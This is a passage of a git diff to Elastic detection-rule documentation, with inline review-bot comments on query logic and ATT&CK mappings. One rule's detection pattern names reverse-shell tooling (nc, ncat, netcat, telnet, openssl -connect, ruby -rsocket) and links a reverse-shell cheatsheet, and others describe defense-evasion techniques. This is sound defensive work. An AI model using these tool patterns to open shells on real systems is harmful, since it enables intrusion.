Reference URL: https://attack.mitre.org/techniques/T1218/004/ +* Sub-technique: +** Name: Mshta +** ID: T1218.005 +** Reference URL: https://attack.mitre.org/techniques/T1218/005/ +* Sub-technique: +** Name: Regsvcs/Regasm +** ID: T1218.009 +** Reference URL: https://attack.mitre.org/techniques/T1218/009/ +* Sub-technique: +** Name: Regsvr32 +** ID: T1218.010 +** Reference URL: https://attack.mitre.org/techniques/T1218/010/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ +* Technique: +** Name: System Script Proxy Execution +** ID: T1216 +** Reference URL: https://attack.mitre.org/techniques/T1216/ +* Technique: +** Name: XSL Script Processing +** ID: T1220 +** Reference URL: https://attack.mitre.org/techniques/T1220/ diff --git a/docs/detections/prebuilt-rules/rule-details/deleting-backup-catalogs-with-wbadmin.asciidoc b/docs/detections/prebuilt-rules/rule-details/deleting-backup-catalogs-with-wbadmin.asciidoc index cca310b2a4..b8317543e2 100644 --- a/docs/detections/prebuilt-rules/rule-details/deleting-backup-catalogs-with-wbadmin.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/deleting-backup-catalogs-with-wbadmin.asciidoc @@ -34,7 +34,7 @@ Identifies use of the wbadmin.exe to delete the backup catalog. Ransomware and o * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -109,3 +109,7 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Inhibit System Recovery ** ID: T1490 ** Reference URL: https://attack.mitre.org/techniques/T1490/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/deprecated-potential-reverse-shell-via-suspicious-parent-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/deprecated-potential-reverse-shell-via-suspicious-parent-process.asciidoc new file mode 100644 index 0000000000..cf3dbfc07b --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/deprecated-potential-reverse-shell-via-suspicious-parent-process.asciidoc 
@@ -0,0 +1,95 @@ +[[deprecated-potential-reverse-shell-via-suspicious-parent-process]] +=== Deprecated - Potential Reverse Shell via Suspicious Parent Process + +This detection rule detects the creation of a shell through a suspicious parent child relationship. Any reverse shells spawned by the specified utilities that use a forked process to initialize the connection attempt will be captured through this rule. Attackers may spawn reverse shells to establish persistence onto a target system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +This rule was deprecated due to its addition to the umbrella `Potential Reverse Shell via Suspicious Child Process` (76e4d92b-61c1-4a95-ab61-5fd94179a1ee) rule. 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.parent.entity_id with maxspan=1s +[ process where host.os.type == "linux" and event.type == "start" and event.action == "fork" and ( + (process.name : "python*" and process.args == "-c" and not process.args == "/usr/bin/supervisord") or + (process.name : "php*" and process.args == "-r") or + (process.name : "perl" and process.args == "-e") or + (process.name : "ruby" and process.args in ("-e", "-rsocket")) or + (process.name : "lua*" and process.args == "-e") or + (process.name : "openssl" and process.args : "-connect") or + (process.name : ("nc", "ncat", "netcat") and process.args_count >= 3 and not process.args == "-z") or + (process.name : "telnet" and process.args_count >= 3) or + (process.name : "awk")) and + process.parent.name : ("python*", "php*", "perl", "ruby", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk") ] +[ network where host.os.type == "linux" and event.type == "start" and event.action in ("connection_attempted", "connection_accepted") and + process.name : ("python*", "php*", "perl", "ruby", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk") and + destination.ip != null and destination.ip != "127.0.0.1" and destination.ip != "::1" ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: 
https://attack.mitre.org/techniques/T1071/ diff --git a/docs/detections/prebuilt-rules/rule-details/disable-windows-event-and-security-logs-using-built-in-tools.asciidoc b/docs/detections/prebuilt-rules/rule-details/disable-windows-event-and-security-logs-using-built-in-tools.asciidoc index 30ed45dc45..fff1490ec7 100644 --- a/docs/detections/prebuilt-rules/rule-details/disable-windows-event-and-security-logs-using-built-in-tools.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/disable-windows-event-and-security-logs-using-built-in-tools.asciidoc @@ -37,7 +37,7 @@ Identifies attempts to disable EventLog via the logman Windows utility, PowerShe * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -123,6 +123,10 @@ process where host.os.type == "windows" and event.type == "start" and ** ID: T1562 ** Reference URL: https://attack.mitre.org/techniques/T1562/ * Sub-technique: +** Name: Disable Windows Event Logging +** ID: T1562.002 +** Reference URL: https://attack.mitre.org/techniques/T1562/002/ +* Sub-technique: ** Name: Indicator Blocking ** ID: T1562.006 ** Reference URL: https://attack.mitre.org/techniques/T1562/006/ diff --git a/docs/detections/prebuilt-rules/rule-details/disabling-user-account-control-via-registry-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/disabling-user-account-control-via-registry-modification.asciidoc index 1cb9d9cc95..73d11d4ad3 100644 --- a/docs/detections/prebuilt-rules/rule-details/disabling-user-account-control-via-registry-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/disabling-user-account-control-via-registry-modification.asciidoc @@ -38,7 +38,7 @@ User Account Control (UAC) can help mitigate the impact of malware on Windows ho * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: 
@@ -145,3 +145,15 @@ registry where host.os.type == "windows" and event.type == "change" and ** Name: Bypass User Account Control ** ID: T1548.002 ** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/disabling-windows-defender-security-settings-via-powershell.asciidoc b/docs/detections/prebuilt-rules/rule-details/disabling-windows-defender-security-settings-via-powershell.asciidoc index 43c8c3b666..036a84243b 100644 --- a/docs/detections/prebuilt-rules/rule-details/disabling-windows-defender-security-settings-via-powershell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/disabling-windows-defender-security-settings-via-powershell.asciidoc @@ -32,11 +32,12 @@ Identifies use of the Set-MpPreference PowerShell command to disable or weaken c * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -113,3 +114,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Disable or Modify Tools ** ID: T1562.001 ** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/dns-over-https-enabled-via-registry.asciidoc b/docs/detections/prebuilt-rules/rule-details/dns-over-https-enabled-via-registry.asciidoc index d9ff7e58c4..6c60982d0d 100644 --- a/docs/detections/prebuilt-rules/rule-details/dns-over-https-enabled-via-registry.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/dns-over-https-enabled-via-registry.asciidoc @@ -36,7 +36,7 @@ Identifies when a user enables DNS-over-HTTPS. This can be used to hide internet * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -78,3 +78,7 @@ registry where host.os.type == "windows" and event.type in ("creation", "change" ** Name: Impair Defenses ** ID: T1562 ** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/dynamic-linker-copy.asciidoc b/docs/detections/prebuilt-rules/rule-details/dynamic-linker-copy.asciidoc index 8e0c3e775b..ef500e3ad2 100644 --- a/docs/detections/prebuilt-rules/rule-details/dynamic-linker-copy.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/dynamic-linker-copy.asciidoc @@ -32,7 +32,7 @@ Detects the copying of the Linux dynamic loader binary and subsequent file creat * Threat: Orbit * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/encrypting-files-with-winrar-or-7z.asciidoc b/docs/detections/prebuilt-rules/rule-details/encrypting-files-with-winrar-or-7z.asciidoc index 8ac0fe944d..fce6a6dd06 100644 --- a/docs/detections/prebuilt-rules/rule-details/encrypting-files-with-winrar-or-7z.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/encrypting-files-with-winrar-or-7z.asciidoc 
@@ -36,7 +36,7 @@ Identifies use of WinRar or 7z to create an encrypted files. Adversaries will of * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -118,3 +118,7 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Archive via Utility ** ID: T1560.001 ** Reference URL: https://attack.mitre.org/techniques/T1560/001/ +* Technique: +** Name: Data from Local System +** ID: T1005 +** Reference URL: https://attack.mitre.org/techniques/T1005/ diff --git a/docs/detections/prebuilt-rules/rule-details/enumeration-of-kernel-modules-via-proc.asciidoc b/docs/detections/prebuilt-rules/rule-details/enumeration-of-kernel-modules-via-proc.asciidoc index b0a906fc74..269673aaa9 100644 --- a/docs/detections/prebuilt-rules/rule-details/enumeration-of-kernel-modules-via-proc.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/enumeration-of-kernel-modules-via-proc.asciidoc @@ -3,7 +3,7 @@ Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This identifies attempts to enumerate information about a kernel module using the /proc/modules filesystem. This filesystem is used by utilities such as lsmod and kmod to list the available kernel modules. -*Rule type*: eql +*Rule type*: new_terms *Rule indices*: @@ -24,13 +24,12 @@ Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unlo *Tags*: -* Domain: Endpoint * OS: Linux * Use Case: Threat Detection * Tactic: Discovery * Rule Type: BBR -*Version*: 3 +*Version*: 103 *Rule authors*: 
@@ -66,11 +65,7 @@ Add the newly installed `auditd manager` to an agent policy, and deploy the agen [source, js] ---------------------------------- -file where host.os.type == "linux" and event.action == "opened-file" and file.path == "/proc/modules" and not -( - process.name in ("auditbeat", "kmod", "modprobe", "lsmod", "insmod", "modinfo", "rmmod", "SchedulerRunner", "grep") or - process.parent.pid == 1 or process.title : "*grep*" -) +host.os.type:linux and event.category:file and event.action:"opened-file" and file.path:"/proc/modules" ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/enumeration-of-kernel-modules.asciidoc b/docs/detections/prebuilt-rules/rule-details/enumeration-of-kernel-modules.asciidoc index 663f59aaf7..fc083f0da6 100644 --- a/docs/detections/prebuilt-rules/rule-details/enumeration-of-kernel-modules.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/enumeration-of-kernel-modules.asciidoc @@ -29,7 +29,7 @@ Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unlo * Tactic: Discovery * Data Source: Elastic Defend -*Version*: 205 +*Version*: 206 *Rule authors*: @@ -47,8 +47,7 @@ event.category:process and host.os.type:linux and event.type:start and ( (process.name:(lsmod or modinfo)) or (process.name:kmod and process.args:list) or (process.name:depmod and process.args:(--all or -a)) -) and process.parent.name:(sudo or bash or dash or ash or sh or tcsh or csh or zsh or ksh or fish) and -not process.parent.user.id:0 +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/esxi-discovery-via-find.asciidoc b/docs/detections/prebuilt-rules/rule-details/esxi-discovery-via-find.asciidoc index a895faf7d0..200f8b3755 100644 --- a/docs/detections/prebuilt-rules/rule-details/esxi-discovery-via-find.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/esxi-discovery-via-find.asciidoc 
@@ -31,7 +31,7 @@ Identifies instances where the 'find' command is started on a Linux system with * Tactic: Discovery * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/esxi-discovery-via-grep.asciidoc b/docs/detections/prebuilt-rules/rule-details/esxi-discovery-via-grep.asciidoc index 8f93d85973..ea6a6cb59b 100644 --- a/docs/detections/prebuilt-rules/rule-details/esxi-discovery-via-grep.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/esxi-discovery-via-grep.asciidoc @@ -31,7 +31,7 @@ Identifies instances where a process named 'grep', 'egrep', or 'pgrep' is starte * Tactic: Discovery * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/esxi-timestomping-using-touch-command.asciidoc b/docs/detections/prebuilt-rules/rule-details/esxi-timestomping-using-touch-command.asciidoc index fcd87fb5eb..4296da6f93 100644 --- a/docs/detections/prebuilt-rules/rule-details/esxi-timestomping-using-touch-command.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/esxi-timestomping-using-touch-command.asciidoc @@ -31,7 +31,7 @@ Identifies instances where the 'touch' command is executed on a Linux system wit * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/exchange-mailbox-export-via-powershell.asciidoc b/docs/detections/prebuilt-rules/rule-details/exchange-mailbox-export-via-powershell.asciidoc index 36e540e415..72dad3ea3e 100644 --- a/docs/detections/prebuilt-rules/rule-details/exchange-mailbox-export-via-powershell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/exchange-mailbox-export-via-powershell.asciidoc 
@@ -35,7 +35,7 @@ Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, * Resources: Investigation Guide * Data Source: PowerShell Logs -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -111,6 +111,10 @@ event.category:process and host.os.type:windows and ** ID: TA0009 ** Reference URL: https://attack.mitre.org/tactics/TA0009/ * Technique: +** Name: Data from Local System +** ID: T1005 +** Reference URL: https://attack.mitre.org/techniques/T1005/ +* Technique: ** Name: Email Collection ** ID: T1114 ** Reference URL: https://attack.mitre.org/techniques/T1114/ diff --git a/docs/detections/prebuilt-rules/rule-details/executable-file-with-unusual-extension.asciidoc b/docs/detections/prebuilt-rules/rule-details/executable-file-with-unusual-extension.asciidoc new file mode 100644 index 0000000000..674dc4eaab --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/executable-file-with-unusual-extension.asciidoc 
@@ -0,0 +1,80 @@ +[[executable-file-with-unusual-extension]] +=== Executable File with Unusual Extension + +Identifies the creation or modification of an executable file with an unexpected file extension. Attackers may attempt to evade detection by masquerading files using the file extension values used by image, audio, or document file types. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 60m + +*Searches indices from*: now-119m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.action != "deletion" and + + /* MZ header or its common base64 equivalent TVqQ */ + file.Ext.header_bytes : ("4d5a*", "54567151*") and + + ( + /* common image file extensions */ + file.extension : ("jpg", "jpeg", "emf", "tiff", "gif", "png", "bmp", "fpx", "eps", "svg", "inf") or + + /* common audio and video file extensions */ + file.extension : ("mp3", "wav", "avi", "mpeg", "flv", "wma", "wmv", "mov", "mp4", "3gp") or + + /* common document file extensions */ + file.extension : ("txt", "pdf", "doc", "docx", "rtf", "ppt", "pptx", "xls", "xlsx", "hwp", "html") + ) and + not process.pid == 4 and + not process.executable : "?:\\Program Files (x86)\\Trend Micro\\Client Server Security Agent\\Ntrtscan.exe" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** 
Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Masquerade File Type +** ID: T1036.008 +** Reference URL: https://attack.mitre.org/techniques/T1036/008/ diff --git a/docs/detections/prebuilt-rules/rule-details/execution-from-a-removable-media-with-network-connection.asciidoc b/docs/detections/prebuilt-rules/rule-details/execution-from-a-removable-media-with-network-connection.asciidoc new file mode 100644 index 0000000000..0e11fc74b6 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/execution-from-a-removable-media-with-network-connection.asciidoc 
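Review bot: the grouping comments in the new `executable-file-with-unusual-extension` query mislabel one entry: `"inf"` sits under `/* common image file extensions */`, but `.inf` is a Windows setup information file, not an image format. Either move it to its own commented group (an MZ-headed `.inf` is still worth matching) or drop it, so a reader tuning the extension lists is not misled. The `file.Ext.header_bytes : ("4d5a*", "54567151*")` pair is correct (`54 56 71 51` is the hex of `TVqQ`, the base64 of an MZ header), so no change needed there.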
@@ -0,0 +1,68 @@ +[[execution-from-a-removable-media-with-network-connection]] +=== Execution from a Removable Media with Network Connection + +Identifies process execution from a removable media and by an unusual process. Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Initial Access +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id with maxspan=5m + [process where host.os.type == "windows" and event.action == "start" and + + /* Direct Exec from USB */ + (process.Ext.device.bus_type : "usb" or process.Ext.device.product_id : "USB *") and + (process.code_signature.trusted == false or process.code_signature.exists == false) and + + not process.code_signature.status : ("errorExpired", "errorCode_endpoint*")] + [network where host.os.type == "windows" and event.action == "connection_attempted"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Replication Through Removable Media +** ID: T1091 +** Reference URL: https://attack.mitre.org/techniques/T1091/ 
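Review bot: the description of `execution-from-a-removable-media-with-network-connection` claims it identifies execution "by an unusual process", but the only process criterion in the query is `process.code_signature.trusted == false or process.code_signature.exists == false`; reword the description to say untrusted or unsigned, which is what the rule actually checks. Separately, the `not process.code_signature.status : ("errorExpired", "errorCode_endpoint*")` exclusion means a USB-launched binary signed with an expired certificate never matches, which is the opposite stance from the `expired-or-revoked-driver-loaded` rule updated in this same change; if that is deliberate, a short comment in the query explaining why expired signatures are treated as benign here would help.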
diff --git a/docs/detections/prebuilt-rules/rule-details/execution-of-an-unsigned-service.asciidoc b/docs/detections/prebuilt-rules/rule-details/execution-of-an-unsigned-service.asciidoc index 3cb015a738..397c3b3b16 100644 --- a/docs/detections/prebuilt-rules/rule-details/execution-of-an-unsigned-service.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/execution-of-an-unsigned-service.asciidoc @@ -27,10 +27,11 @@ This rule identifies the execution of unsigned executables via service control m * OS: Windows * Use Case: Threat Detection * Tactic: Execution +* Tactic: Defense Evasion * Rule Type: BBR * Data Source: Elastic Defend -*Version*: 102 +*Version*: 103 *Rule authors*: @@ -64,3 +65,15 @@ process.parent.executable:"C:\\Windows\\System32\\services.exe" and ** Name: Service Execution ** ID: T1569.002 ** Reference URL: https://attack.mitre.org/techniques/T1569/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/execution-via-microsoft-dotnet-clickonce-host.asciidoc b/docs/detections/prebuilt-rules/rule-details/execution-via-microsoft-dotnet-clickonce-host.asciidoc new file mode 100644 index 0000000000..e2f5906838 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/execution-via-microsoft-dotnet-clickonce-host.asciidoc 
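Review bot: the new `T1036.001 Invalid Code Signature` mapping on `execution-of-an-unsigned-service` does not fit the rule as described ("execution of unsigned executables via service control manager"): an executable with no signature at all is not an invalid signature, and ATT&CK reserves T1036.001 for binaries that carry a signature that fails to validate. Either keep the new Defense Evasion tactic with the parent `T1036 Masquerading` only, or tighten the query to signed-but-invalid binaries if that was the intent.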
@@ -0,0 +1,71 @@ +[[execution-via-microsoft-dotnet-clickonce-host]] +=== Execution via Microsoft DotNet ClickOnce Host + +Identifies the execution of DotNet ClickOnce installer via Dfsvc.exe trampoline. Adversaries may take advantage of ClickOnce to proxy execution of malicious payloads via trusted Microsoft processes. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 60m + +*Searches indices from*: now-119m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by user.id with maxspan=5s + [process where host.os.type == "windows" and event.action == "start" and + process.name : "rundll32.exe" and process.command_line : ("*dfshim*ShOpenVerbApplication*", "*dfshim*#*")] + [network where host.os.type == "windows" and process.name : "dfsvc.exe"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ 
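Review bot: the second event of the `execution-via-microsoft-dotnet-clickonce-host` sequence, `[network where host.os.type == "windows" and process.name : "dfsvc.exe"]`, has no `event.action` filter, so any network event attributed to `dfsvc.exe` (including DNS lookups or disconnects) completes the sequence, and the join is only on `user.id` within 5s rather than on the process itself. Constrain it the way the removable-media rule in this same change does, with `event.action == "connection_attempted"`, and state in the description that the two events are correlated per user rather than per process, since `dfsvc.exe` is a different process from the `rundll32.exe` trampoline.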
diff --git a/docs/detections/prebuilt-rules/rule-details/execution-via-ms-visualstudio-pre-post-build-events.asciidoc b/docs/detections/prebuilt-rules/rule-details/execution-via-ms-visualstudio-pre-post-build-events.asciidoc new file mode 100644 index 0000000000..dcce169af8 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/execution-via-ms-visualstudio-pre-post-build-events.asciidoc 
@@ -0,0 +1,108 @@ +[[execution-via-ms-visualstudio-pre-post-build-events]] +=== Execution via MS VisualStudio Pre/Post Build Events + +Identifies the execution of a command via Microsoft Visual Studio Pre or Post build events. Adversaries may backdoor a trusted visual studio project to execute a malicious command during the project build process. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 60m + +*Searches indices from*: now-119m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/visualstudio/ide/reference/pre-build-event-post-build-event-command-line-dialog-box?view=vs-2022 +* https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html +* https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/ +* https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Execution/execution_evasion_visual_studio_prebuild_event.evtx + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence with maxspan=1m + [process where host.os.type == "windows" and event.action == "start" and + process.name : "cmd.exe" and process.parent.name : "MSBuild.exe" and + process.args : "?:\\Users\\*\\AppData\\Local\\Temp\\tmp*.exec.cmd"] by process.entity_id + [process where host.os.type == "windows" and event.action == "start" and + process.name : ( + "cmd.exe", "powershell.exe", + "MSHTA.EXE", "CertUtil.exe", + "CertReq.exe", "rundll32.exe", + "regsvr32.exe", "MSbuild.exe", + "cscript.exe", "wscript.exe", + 
"installutil.exe" + ) and + not + ( + process.name : ("cmd.exe", "powershell.exe") and + process.args : ( + "*\\vcpkg\\scripts\\buildsystems\\msbuild\\applocal.ps1", + "HKLM\\SOFTWARE\\Microsoft\\VisualStudio\\SxS\\VS?", + "process.versions.node*", + "?:\\Program Files\\nodejs\\node.exe", + "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\MSBuild\\ToolsVersions\\*", + "*Get-ChildItem*Tipasplus.css*", + "Build\\GenerateResourceScripts.ps1", + "Shared\\Common\\..\\..\\BuildTools\\ConfigBuilder.ps1\"", + "?:\\Projets\\*\\PostBuild\\MediaCache.ps1" + ) + ) and + not process.executable : "?:\\Program Files*\\Microsoft Visual Studio\\*\\MSBuild.exe" and + not (process.name : "cmd.exe" and + process.command_line : + ("*vswhere.exe -property catalog_productSemanticVersion*", + "*git log --pretty=format*", "*\\.nuget\\packages\\vswhere\\*", + "*Common\\..\\..\\BuildTools\\*")) + ] by process.parent.entity_id + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ diff --git a/docs/detections/prebuilt-rules/rule-details/execution-via-mssql-xp-cmdshell-stored-procedure.asciidoc b/docs/detections/prebuilt-rules/rule-details/execution-via-mssql-xp-cmdshell-stored-procedure.asciidoc index 693af50fa9..0f2de613ad 100644 --- a/docs/detections/prebuilt-rules/rule-details/execution-via-mssql-xp-cmdshell-stored-procedure.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/execution-via-mssql-xp-cmdshell-stored-procedure.asciidoc 
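Review bot: the command-line exclusions in `execution-via-ms-visualstudio-pre-post-build-events` are substring matches, and `"*git log --pretty=format*"`, `"*\\.nuget\\packages\\vswhere\\*"` and `"*Common\\..\\..\\BuildTools\\*"` are excluded wherever they appear in `process.command_line`, so a build event that chains a malicious command after one of those tokens is silently dropped; anchor these on `process.executable` or the full `process.args` value instead. The `"?:\\Projets\\*\\PostBuild\\MediaCache.ps1"` entry also reads as a single-environment tuning exclusion rather than something a prebuilt rule should ship with. Finally, the Execution tactic (TA0002) at the end of the mapping has no technique beneath it; add the technique it is meant to cover or drop the tactic.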
